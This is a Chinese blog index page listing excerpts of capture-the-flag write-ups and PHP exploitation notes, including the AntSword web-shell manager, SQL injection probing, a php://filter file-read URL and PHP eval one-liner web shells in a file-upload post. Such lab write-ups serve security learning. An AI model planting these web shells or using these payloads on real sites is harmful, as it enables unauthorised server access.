会员
众包
新闻
博问
闪存
赞助商
HarmonyOS
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
欧欧欧欧提大人
来到了就是有缘份,一起学习吧
博客园
首页
新随笔
联系
订阅
管理
上一页
1
2
3
4
下一页
2019年11月16日
Linux WIndows 蚁剑 安装 教程
摘要: ..老师发的菜刀拓展太隔手了...换蚁剑了 下载加载器 https://github.com/AntSwordProject/AntSword-Loader 下载文件 https://github.com/AntSwordProject/antSword 不过这个下载网速是真的费工夫,试了改host
阅读全文
posted @ 2019-11-16 00:40 Zhu013
阅读(2783)
评论(0)
推荐(0)
2019年9月30日
Web_php_wrong_nginx_config writeup
摘要: Web_php_wrong_nginx_config writeup Zhu013 未经允许请勿转载 1.进入页面发现需要登陆 2.robots.txt 发现hint.php Hack.php hint.php提示 配置文件也许有问题呀:/etc/nginx/sites-enabled/site.c
阅读全文
posted @ 2019-09-30 00:26 Zhu013
阅读(1746)
评论(0)
推荐(0)
2019年9月26日
PHP反序列化利用(更新中)
摘要: 根据题总结 源自一道ctf题 class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 对序列化反序列化进行了理解。 serialize()是序列化函数,它可以保存一个的所
阅读全文
posted @ 2019-09-26 18:48 Zhu013
阅读(709)
评论(0)
推荐(0)
2019年9月25日
assert()理解
摘要: 源自一道CTF题,理解全部写在注释里面
阅读全文
posted @ 2019-09-25 22:15 Zhu013
阅读(968)
评论(0)
推荐(0)
2019年9月21日
PHP == 利用
摘要: <?php 'a'==0 // true '12a'==12 //true '1'==1 //true '1aaaa55sss66'==1 //true 1==true==“1” 更多参考https://www.cnblogs.com/wh4am1/p/6687199.html
阅读全文
posted @ 2019-09-21 13:36 Zhu013
阅读(146)
评论(0)
推荐(0)
2019年9月20日
攻防世界 ics-05 write up
摘要: 访问,由于提示说是后台,所以访问index.php/my-webshell(路径任意) 发现是文件包含页面 http://111.198.29.45:42305/index.php/dsf?page=php://filter/read=convert.base64-encode/resource=i
阅读全文
posted @ 2019-09-20 00:59 Zhu013
阅读(255)
评论(0)
推荐(0)
2019年9月19日
攻防世界 Web_php_include write up
摘要: 攻防世界 Web_php_include write updirbuster 扫目录 发现phpinfo()可以看到绝对路径 和 phpmyadmin进入phpmyadmin页面 root直接空密码登录查看phpmyadmin变量 secure file priv 值为空 说明可以写入一句话load
阅读全文
posted @ 2019-09-19 16:13 Zhu013
阅读(1608)
评论(5)
推荐(0)
2019年9月17日
攻防世界 web2 write up
摘要: #攻防世界 web2 write up minwen='a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws' #使用php函数从外到内 #str_rot123() #strrev() #base64decode() #观察这个fo
阅读全文
posted @ 2019-09-17 14:29 Zhu013
阅读(839)
评论(0)
推荐(0)
2019年9月10日
BUGKU login3(SKCTF)
摘要: 进入页面 先输入1 和 1 发现 提示 用户名错误 猜测输入用户名 admin 和 1 提示 密码错误 继续猜测输入用户名 admin' 和1 提示 用户名错误 继续猜测输入 用户名 admin'#和1 提示 密码错误 说明 逻辑是先检查用户名是否正确再匹配密码,当页面出现密码错误时,说明用户名内容
阅读全文
posted @ 2019-09-10 22:57 Zhu013
阅读(375)
评论(0)
推荐(0)
2019年9月9日
文件上传
摘要: 显示 目录 <script language=php>system("ls")</script> 一句话 <script language=php>echo 'a'; eval($_POST['flag']);</script> <script language="php">eval($_POST[
阅读全文
posted @ 2019-09-09 23:28 Zhu013
阅读(182)
评论(0)
推荐(0)
上一页
1
2
3
4
下一页
公告